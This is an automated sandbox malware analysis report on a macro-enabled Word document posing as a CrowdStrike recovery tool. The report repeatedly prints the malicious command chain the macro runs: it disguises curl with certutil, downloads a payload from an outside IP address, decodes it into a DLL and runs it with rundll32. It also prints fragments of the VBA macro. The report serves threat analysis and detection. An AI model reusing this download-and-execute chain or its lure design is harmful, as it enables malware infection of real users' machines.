Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID:1478411
MD5:dd2100dfa067caae416b885637adc4ef
SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags:docm
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Microsoft Office Child Process
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1384 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 300 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • xcopy.exe (PID: 3096 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)
      • certutil.exe (PID: 3112 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • certutil.exe (PID: 3128 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • curl.exe (PID: 3136 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • certutil.exe (PID: 3152 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • rundll32.exe (PID: 3160 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)
  • chrome.exe (PID: 3236 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 3428 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 3224 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • chrome.exe (PID: 300 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • WINWORD.EXE (PID: 300 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 3616 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • xcopy.exe (PID: 3644 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)
      • certutil.exe (PID: 3548 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • certutil.exe (PID: 3796 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • curl.exe (PID: 2432 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • certutil.exe (PID: 2724 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
      • rundll32.exe (PID: 2360 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 3128, TargetFilename: C:\Users\user\AppData\Local\Temp\curl.exe
Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, SourceProcessId: 300, StartAddress: 772EA280, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 300
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit,
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit,
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmpJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4D9C9C CryptHashData,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F359C9C CryptHashData,
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\GoogleJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_3236_441263539Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A2738 recv,WSAGetLastError,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmpJump to behavior
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exeString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exeString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.drString found in binary or memory: Usage: curl [options...] <url>
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: sb-ssl.google.com
Source: unknownHTTP traffic detected: POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: sb-ssl.google.comConnection: keep-aliveContent-Length: 1073Content-Type: application/octet-streamSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.drString found in binary or memory: http://172.104.160.
Source: vbaProject.binString found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.binString found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drString found in binary or memory: https://aka.ms/WRH
Source: document.xmlString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drString found in binary or memory: https://azure.status.microsoft/status
Source: curl.exeString found in binary or memory: https://curl.se/
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drString found in binary or memory: https://curl.se/P
Source: curl.exeString found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drString found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drString found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.drString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drString found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drString found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

System Summary

barindex
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)
Source: ~WRC0001.tmp.16.drOLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "
